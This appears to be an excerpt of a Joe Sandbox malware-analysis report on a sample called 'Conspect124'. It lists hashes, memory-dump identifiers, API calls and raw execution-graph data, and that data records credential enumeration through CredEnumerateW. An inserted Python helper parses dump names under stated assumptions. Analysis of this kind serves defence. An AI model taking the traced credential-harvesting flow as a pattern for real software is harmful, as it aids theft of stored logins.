                                      • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                      • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                      • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                      • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                      • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                      • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                      • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                      • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                      • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                      • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                      • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
                                      • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                      • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8
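                                       The memory-dump identifiers listed under "Memory Dump Source" all share one dotted layout, and the protection field is what tells an analyst which dump holds executable code. The Python helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses such an identifier, labels the protection field with the matching Windows PAGE_* constant (those values come from winnt.h and are factual), and lists the dumps of process 7 by RVA relative to the image base 0x400000 given in the report. The field meanings assumed for the name (process index, stage, unique id, base address, page protection, then three trailing flag fields) and the helper names `parse_sdmp_name` and `layout` are assumptions made for this example; the identifiers themselves are copied from the section above.

```python
import re
from dataclasses import dataclass

# Windows memory-protection constants from winnt.h (factual values).
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}

# ASSUMED layout of a Joe Sandbox ".sdmp" identifier (not documented on the page):
# <process index>.<stage>.<unique id>.<base address>.<protection>.<type>.<state>.<index>.sdmp
_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<idx>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process: int
    stage: int
    base: int
    protection: int

    @property
    def protection_name(self) -> str:
        # Mask off modifier bits (PAGE_GUARD 0x100, PAGE_NOCACHE 0x200, PAGE_WRITECOMBINE 0x400)
        # so only the base protection is looked up.
        return PAGE_PROTECTIONS.get(self.protection & 0xFF, f"0x{self.protection:x}")

    @property
    def executable(self) -> bool:
        # All four executable protections live in the 0x10..0x80 bits.
        return bool(self.protection & 0xF0)


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one dump identifier (hypothetical helper; field meanings are assumed)."""
    m = _SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a dump identifier: {name!r}")
    return DumpRegion(
        process=int(m["proc"], 16),
        stage=int(m["stage"], 16),
        base=int(m["base"], 16),
        protection=int(m["prot"], 16),
    )


def layout(names, image_base):
    """Return (RVA, protection name, executable?) per dump at or above image_base, sorted by RVA."""
    rows = []
    for n in names:
        r = parse_sdmp_name(n)
        if r.base >= image_base:
            rows.append((r.base - image_base, r.protection_name, r.executable))
    return sorted(rows)


# Identifiers copied from the "Memory Dump Source" entries in this section.
REPORT_DUMPS = [
    "00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp",
    "00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp",
    "00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp",
    "00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp",
    "00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp",
    "00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp",
    "00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp",
]

if __name__ == "__main__":
    for rva, prot, is_exec in layout(REPORT_DUMPS, 0x400000):
        print(f"RVA 0x{rva:06x}  {prot:<24} {'code' if is_exec else 'data/header'}")
```

Under the assumed layout the only executable dump is the one at RVA 0x1000 (PAGE_EXECUTE_READ), which is the region the disassembly entries above are sourced from; the header at RVA 0 and the regions at 0x8000, 0x5C000, 0x6F000 and 0xA3000 are read-only, and 0xA000 is PAGE_WRITECOPY, the protection a loader gives writable PE sections.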

                                      Execution Graph

                                      Execution Coverage:6%
                                      Dynamic/Decrypted Code Coverage:9.2%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:64
                                       execution_graph: rendered on the original page as an interactive call graph; the raw node and edge data behind it is not reproduced here. The node labels recoverable from that data name the API calls reached from the analysed functions, including FreeLibrary, GetPrivateProfileIntW, WritePrivateProfileStringW, _itow, memset, memcpy, malloc, free, operator new (??2@YAPAXI) and operator delete (??3@YAXPAX), SetFilePointer, ReadFile, GetLastError, UnmapViewOfFile, CloseHandle, Sleep, FindResourceW, SizeofResource, LoadResource, LockResource, LoadLibraryW, GetProcAddress, MessageBoxW, SetErrorMode, GetModuleHandleW, EnumResourceTypesW, GetSystemDirectoryW, CoInitialize, RegisterClassW, CreateWindowExW, ShowWindow, UpdateWindow, LoadAcceleratorsW, GetMessageW, TranslateAcceleratorW, IsDialogMessageW, TranslateMessage, DispatchMessageW, CoUninitialize, DeleteObject, CreateFontIndirectW, LoadIconW, _wcsicmp, wcscpy, wcscat, wcslen and wcsncat.
37844->37845 37845->37843 37847 409a41 37846->37847 37848 4099fb malloc 37846->37848 37847->37757 37850 409a37 37848->37850 37851 409a1c 37848->37851 37850->37757 37852 409a30 free 37851->37852 37853 409a20 memcpy 37851->37853 37852->37850 37853->37852 37855 40a9e7 37854->37855 37856 40a9dc free 37854->37856 37858 4099f4 3 API calls 37855->37858 37857 40a9f2 37856->37857 37857->37762 37858->37857 37883 409bca GetModuleFileNameW 37859->37883 37861 40dce6 wcsrchr 37862 40dcf5 37861->37862 37863 40dcf9 wcscat 37861->37863 37862->37863 37863->37769 37884 44db70 37864->37884 37868 40dbfd 37887 4447d9 37868->37887 37871 40dc34 wcscpy wcscpy 37913 40d6f5 37871->37913 37872 40dc1f wcscpy 37872->37871 37875 40d6f5 3 API calls 37876 40dc73 37875->37876 37877 40d6f5 3 API calls 37876->37877 37878 40dc89 37877->37878 37879 40d6f5 3 API calls 37878->37879 37880 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37879->37880 37919 40da80 37880->37919 37883->37861 37885 40dbb4 memset memset 37884->37885 37886 409bca GetModuleFileNameW 37885->37886 37886->37868 37889 4447f4 37887->37889 37888 40dc1b 37888->37871 37888->37872 37889->37888 37890 444807 ??2@YAPAXI 37889->37890 37891 44481f 37890->37891 37892 444873 _snwprintf 37891->37892 37893 4448ab wcscpy 37891->37893 37926 44474a 8 API calls 37892->37926 37895 4448bb 37893->37895 37927 44474a 8 API calls 37895->37927 37896 4448a7 37896->37893 37896->37895 37898 4448cd 37928 44474a 8 API calls 37898->37928 37900 4448e2 37929 44474a 8 API calls 37900->37929 37902 4448f7 37930 44474a 8 API calls 37902->37930 37904 44490c 37931 44474a 8 API calls 37904->37931 37906 444921 37932 44474a 8 API calls 37906->37932 37908 444936 37933 44474a 8 API calls 37908->37933 37910 44494b 37934 44474a 8 API calls 37910->37934 37912 444960 ??3@YAXPAX 37912->37888 37914 44db70 37913->37914 37915 40d702 memset GetPrivateProfileStringW 37914->37915 37916 40d752 37915->37916 37917 40d75c WritePrivateProfileStringW 37915->37917 37916->37917 37918 40d758 
37916->37918 37917->37918 37918->37875 37920 44db70 37919->37920 37921 40da8d memset 37920->37921 37922 40daac LoadStringW 37921->37922 37923 40dac6 37922->37923 37923->37922 37925 40dade 37923->37925 37935 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37923->37935 37925->37697 37926->37896 37927->37898 37928->37900 37929->37902 37930->37904 37931->37906 37932->37908 37933->37910 37934->37912 37935->37923 37946 409b98 GetFileAttributesW 37936->37946 37938 40daea 37939 40db63 37938->37939 37940 40daef wcscpy wcscpy GetPrivateProfileIntW 37938->37940 37939->37699 37947 40d65d GetPrivateProfileStringW 37940->37947 37942 40db3e 37948 40d65d GetPrivateProfileStringW 37942->37948 37944 40db4f 37949 40d65d GetPrivateProfileStringW 37944->37949 37946->37938 37947->37942 37948->37944 37949->37939 37985 40eaff 37950->37985 37954 411ae2 memset 37953->37954 37955 411b8f 37953->37955 38025 409bca GetModuleFileNameW 37954->38025 37967 411a8b 37955->37967 37957 411b0a wcsrchr 37958 411b22 wcscat 37957->37958 37959 411b1f 37957->37959 38026 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37958->38026 37959->37958 37961 411b67 38027 402afb 37961->38027 37965 411b7f 38083 40ea13 SendMessageW memset SendMessageW 37965->38083 37968 402afb 27 API calls 37967->37968 37969 411ac0 37968->37969 37970 4110dc 37969->37970 37971 41113e 37970->37971 37976 4110f0 37970->37976 38108 40969c LoadCursorW SetCursor 37971->38108 37973 411143 38109 4032b4 37973->38109 38127 444a54 37973->38127 37974 4110f7 _wcsicmp 37974->37976 37975 411157 37977 40ada2 _wcsicmp 37975->37977 37976->37971 37976->37974 38130 410c46 10 API calls 37976->38130 37980 411167 37977->37980 37978 4111af 37980->37978 37981 4111a6 qsort 37980->37981 37981->37978 37984->37781 37986 40eb10 37985->37986 37998 40e8e0 37986->37998 37989 40eb6c memcpy memcpy 37990 40ebb7 37989->37990 37990->37989 37991 40ebf2 ??2@YAPAXI ??2@YAPAXI 37990->37991 37993 40d134 16 API calls 37990->37993 37992 40ec2e 
??2@YAPAXI 37991->37992 37996 40ec65 37991->37996 37992->37996 37993->37990 37996->37996 38008 40ea7f 37996->38008 37997 402f49 37997->37781 37999 40e8f2 37998->37999 38000 40e8eb ??3@YAXPAX 37998->38000 38001 40e900 37999->38001 38002 40e8f9 ??3@YAXPAX 37999->38002 38000->37999 38003 40e911 38001->38003 38004 40e90a ??3@YAXPAX 38001->38004 38002->38001 38005 40e931 ??2@YAPAXI ??2@YAPAXI 38003->38005 38006 40e921 ??3@YAXPAX 38003->38006 38007 40e92a ??3@YAXPAX 38003->38007 38004->38003 38005->37989 38006->38007 38007->38005 38009 40aa04 free 38008->38009 38010 40ea88 38009->38010 38011 40aa04 free 38010->38011 38012 40ea90 38011->38012 38013 40aa04 free 38012->38013 38014 40ea98 38013->38014 38015 40aa04 free 38014->38015 38016 40eaa0 38015->38016 38017 40a9ce 4 API calls 38016->38017 38018 40eab3 38017->38018 38019 40a9ce 4 API calls 38018->38019 38020 40eabd 38019->38020 38021 40a9ce 4 API calls 38020->38021 38022 40eac7 38021->38022 38023 40a9ce 4 API calls 38022->38023 38024 40ead1 38023->38024 38024->37997 38025->37957 38026->37961 38084 40b2cc 38027->38084 38029 402b0a 38030 40b2cc 27 API calls 38029->38030 38031 402b23 38030->38031 38032 40b2cc 27 API calls 38031->38032 38033 402b3a 38032->38033 38034 40b2cc 27 API calls 38033->38034 38035 402b54 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402b6b 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402b82 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402b99 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402bb0 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402bc7 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402bde 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402bf5 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402c0c 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402c23 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402c3a 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402c51 
38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402c68 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402c7f 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402c99 38062->38063 38064 40b2cc 27 API calls 38063->38064 38065 402cb3 38064->38065 38066 40b2cc 27 API calls 38065->38066 38067 402cd5 38066->38067 38068 40b2cc 27 API calls 38067->38068 38069 402cf0 38068->38069 38070 40b2cc 27 API calls 38069->38070 38071 402d0b 38070->38071 38072 40b2cc 27 API calls 38071->38072 38073 402d26 38072->38073 38074 40b2cc 27 API calls 38073->38074 38075 402d3e 38074->38075 38076 40b2cc 27 API calls 38075->38076 38077 402d59 38076->38077 38078 40b2cc 27 API calls 38077->38078 38079 402d78 38078->38079 38080 40b2cc 27 API calls 38079->38080 38081 402d93 38080->38081 38082 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38081->38082 38082->37965 38083->37955 38087 40b58d 38084->38087 38086 40b2d1 38086->38029 38088 40b5a4 GetModuleHandleW FindResourceW 38087->38088 38089 40b62e 38087->38089 38090 40b5c2 LoadResource 38088->38090 38092 40b5e7 38088->38092 38089->38086 38091 40b5d0 SizeofResource LockResource 38090->38091 38090->38092 38091->38092 38092->38089 38100 40afcf 38092->38100 38094 40b608 memcpy 38103 40b4d3 memcpy 38094->38103 38096 40b61e 38104 40b3c1 18 API calls 38096->38104 38098 40b626 38105 40b04b 38098->38105 38101 40b04b ??3@YAXPAX 38100->38101 38102 40afd7 ??2@YAPAXI 38101->38102 38102->38094 38103->38096 38104->38098 38106 40b051 ??3@YAXPAX 38105->38106 38107 40b05f 38105->38107 38106->38107 38107->38089 38108->37973 38110 4032c4 38109->38110 38111 40b633 free 38110->38111 38112 403316 38111->38112 38131 44553b 38112->38131 38116 403480 38329 40368c 15 API calls 38116->38329 38118 403489 38119 40b633 free 38118->38119 38120 403495 38119->38120 38120->37975 38121 4033a9 memset memcpy 38122 4033ec wcscmp 38121->38122 38123 40333c 38121->38123 38122->38123 38123->38116 38123->38121 38123->38122 
38327 4028e7 11 API calls 38123->38327 38328 40f508 6 API calls 38123->38328 38125 403421 _wcsicmp 38125->38123 38128 444a64 FreeLibrary 38127->38128 38129 444a83 38127->38129 38128->38129 38129->37975 38130->37976 38132 445548 38131->38132 38133 445599 38132->38133 38330 40c768 38132->38330 38134 4455a8 memset 38133->38134 38146 4457f2 38133->38146 38413 403988 38134->38413 38141 4458aa 38143 44594a 38141->38143 38144 4458bb memset memset 38141->38144 38142 445672 38424 403fbe memset memset memset memset memset 38142->38424 38148 4459ed 38143->38148 38149 44595e memset memset 38143->38149 38151 414c2e 17 API calls 38144->38151 38153 445854 38146->38153 38515 403e2d memset memset memset memset memset 38146->38515 38156 445a00 memset memset 38148->38156 38157 445b22 38148->38157 38158 414c2e 17 API calls 38149->38158 38150 4455e5 38150->38142 38161 44560f 38150->38161 38159 4458f9 38151->38159 38152 44557a 38154 44558c 38152->38154 38611 4136c0 CoTaskMemFree 38152->38611 38153->38141 38538 403c9c memset memset memset memset memset 38153->38538 38397 444b06 38154->38397 38561 414c2e 38156->38561 38164 445bca 38157->38164 38165 445b38 memset memset memset 38157->38165 38169 44599c 38158->38169 38160 40b2cc 27 API calls 38159->38160 38170 445909 38160->38170 38172 4087b3 338 API calls 38161->38172 38163 445849 38627 40b1ab free free 38163->38627 38171 445c8b memset memset 38164->38171 38228 445cf0 38164->38228 38175 445bd4 38165->38175 38176 445b98 38165->38176 38179 40b2cc 27 API calls 38169->38179 38188 409d1f 6 API calls 38170->38188 38180 414c2e 17 API calls 38171->38180 38189 445621 38172->38189 38173 445585 38612 41366b FreeLibrary 38173->38612 38174 44589f 38628 40b1ab free free 38174->38628 38186 414c2e 17 API calls 38175->38186 38176->38175 38182 445ba2 38176->38182 38191 4459ac 38179->38191 38192 445cc9 38180->38192 38700 4099c6 wcslen 38182->38700 38183 4456b2 38615 40b1ab free free 38183->38615 38185 40b2cc 27 API calls 38195 445a4f 38185->38195 38197 
445be2 38186->38197 38187 403335 38326 4452e5 45 API calls 38187->38326 38200 445919 38188->38200 38613 4454bf 20 API calls 38189->38613 38190 445823 38190->38163 38209 4087b3 338 API calls 38190->38209 38201 409d1f 6 API calls 38191->38201 38203 409d1f 6 API calls 38192->38203 38193 445879 38193->38174 38213 4087b3 338 API calls 38193->38213 38577 409d1f wcslen wcslen 38195->38577 38207 40b2cc 27 API calls 38197->38207 38198 445d3d 38226 40b2cc 27 API calls 38198->38226 38199 445d88 memset memset memset 38210 414c2e 17 API calls 38199->38210 38629 409b98 GetFileAttributesW 38200->38629 38202 4459bc 38201->38202 38696 409b98 GetFileAttributesW 38202->38696 38212 445ce1 38203->38212 38204 445bb3 38703 445403 memset 38204->38703 38205 445680 38205->38183 38447 4087b3 memset 38205->38447 38216 445bf3 38207->38216 38209->38190 38219 445dde 38210->38219 38720 409b98 GetFileAttributesW 38212->38720 38213->38193 38225 409d1f 6 API calls 38216->38225 38217 445928 38217->38143 38630 40b6ef 38217->38630 38227 40b2cc 27 API calls 38219->38227 38220 4459cb 38220->38148 38237 40b6ef 253 API calls 38220->38237 38224 40b2cc 27 API calls 38230 445a94 38224->38230 38232 445c07 38225->38232 38233 445d54 _wcsicmp 38226->38233 38236 445def 38227->38236 38228->38187 38228->38198 38228->38199 38229 445389 259 API calls 38229->38164 38582 40ae18 38230->38582 38231 44566d 38231->38146 38498 413d4c 38231->38498 38240 445389 259 API calls 38232->38240 38241 445d71 38233->38241 38303 445d67 38233->38303 38235 445665 38614 40b1ab free free 38235->38614 38242 409d1f 6 API calls 38236->38242 38237->38148 38245 445c17 38240->38245 38721 445093 23 API calls 38241->38721 38248 445e03 38242->38248 38244 4456d8 38250 40b2cc 27 API calls 38244->38250 38251 40b2cc 27 API calls 38245->38251 38247 44563c 38247->38235 38253 4087b3 338 API calls 38247->38253 38722 409b98 GetFileAttributesW 38248->38722 38249 40b6ef 253 API calls 38249->38187 38256 4456e2 38250->38256 38257 445c23 38251->38257 38252 445d83 
38252->38187 38253->38247 38255 445e12 38261 445e6b 38255->38261 38265 40b2cc 27 API calls 38255->38265 38616 413fa6 _wcsicmp _wcsicmp 38256->38616 38260 409d1f 6 API calls 38257->38260 38263 445c37 38260->38263 38724 445093 23 API calls 38261->38724 38262 4456eb 38268 4456fd memset memset memset memset 38262->38268 38269 4457ea 38262->38269 38270 445389 259 API calls 38263->38270 38264 445b17 38697 40aebe 38264->38697 38272 445e33 38265->38272 38617 409c70 wcscpy wcsrchr 38268->38617 38620 413d29 38269->38620 38276 445c47 38270->38276 38277 409d1f 6 API calls 38272->38277 38274 445e7e 38278 445f67 38274->38278 38281 40b2cc 27 API calls 38276->38281 38282 445e47 38277->38282 38283 40b2cc 27 API calls 38278->38283 38279 445ab2 memset 38284 40b2cc 27 API calls 38279->38284 38286 445c53 38281->38286 38723 409b98 GetFileAttributesW 38282->38723 38288 445f73 38283->38288 38289 445aa1 38284->38289 38285 409c70 2 API calls 38290 44577e 38285->38290 38291 409d1f 6 API calls 38286->38291 38293 409d1f 6 API calls 38288->38293 38289->38264 38289->38279 38294 409d1f 6 API calls 38289->38294 38589 40add4 38289->38589 38594 445389 38289->38594 38603 40ae51 38289->38603 38295 409c70 2 API calls 38290->38295 38296 445c67 38291->38296 38292 445e56 38292->38261 38300 445e83 memset 38292->38300 38297 445f87 38293->38297 38294->38289 38298 44578d 38295->38298 38299 445389 259 API calls 38296->38299 38727 409b98 GetFileAttributesW 38297->38727 38298->38269 38305 40b2cc 27 API calls 38298->38305 38299->38164 38304 40b2cc 27 API calls 38300->38304 38303->38187 38303->38249 38307 445eab 38304->38307 38306 4457a8 38305->38306 38308 409d1f 6 API calls 38306->38308 38309 409d1f 6 API calls 38307->38309 38310 4457b8 38308->38310 38311 445ebf 38309->38311 38619 409b98 GetFileAttributesW 38310->38619 38313 40ae18 9 API calls 38311->38313 38321 445ef5 38313->38321 38314 4457c7 38314->38269 38316 4087b3 338 API calls 38314->38316 38315 40ae51 9 API calls 38315->38321 38316->38269 38317 445f5c 
38318 40aebe FindClose 38317->38318 38318->38278 38319 40add4 2 API calls 38319->38321 38320 40b2cc 27 API calls 38320->38321 38321->38315 38321->38317 38321->38319 38321->38320 38322 409d1f 6 API calls 38321->38322 38324 445f3a 38321->38324 38725 409b98 GetFileAttributesW 38321->38725 38322->38321 38726 445093 23 API calls 38324->38726 38326->38123 38327->38125 38328->38123 38329->38118 38331 40c775 38330->38331 38728 40b1ab free free 38331->38728 38333 40c788 38729 40b1ab free free 38333->38729 38335 40c790 38730 40b1ab free free 38335->38730 38337 40c798 38338 40aa04 free 38337->38338 38339 40c7a0 38338->38339 38731 40c274 memset 38339->38731 38344 40a8ab 9 API calls 38345 40c7c3 38344->38345 38346 40a8ab 9 API calls 38345->38346 38347 40c7d0 38346->38347 38760 40c3c3 38347->38760 38351 40c877 38360 40bdb0 38351->38360 38352 40c86c 38802 4053fe 39 API calls 38352->38802 38358 40c7e5 38358->38351 38358->38352 38359 40c634 50 API calls 38358->38359 38785 40a706 38358->38785 38359->38358 39031 404363 38360->39031 38364 40bdee 38367 40b2cc 27 API calls 38364->38367 38369 40bf5d 38364->38369 38365 40bddf CredEnumerateW 38365->38364 38368 40be02 wcslen 38367->38368 38368->38369 38377 40be1e 38368->38377 39051 40440c 38369->39051 38370 40be26 wcsncmp 38370->38377 38373 40be7d memset 38374 40bea7 memcpy 38373->38374 38373->38377 38375 40bf11 wcschr 38374->38375 38374->38377 38375->38377 38376 40b2cc 27 API calls 38378 40bef6 _wcsnicmp 38376->38378 38377->38369 38377->38370 38377->38373 38377->38374 38377->38375 38377->38376 38379 40bf43 LocalFree 38377->38379 39054 40bd5d 28 API calls 38377->39054 39055 404423 38377->39055 38378->38375 38378->38377 38379->38377 38380 4135f7 39070 4135e0 38380->39070 38383 40b2cc 27 API calls 38384 41360d 38383->38384 38385 40a804 8 API calls 38384->38385 38386 413613 38385->38386 38387 41361b 38386->38387 38388 41363e 38386->38388 38389 40b273 27 API calls 38387->38389 38390 4135e0 FreeLibrary 38388->38390 38391 413625 GetProcAddress 
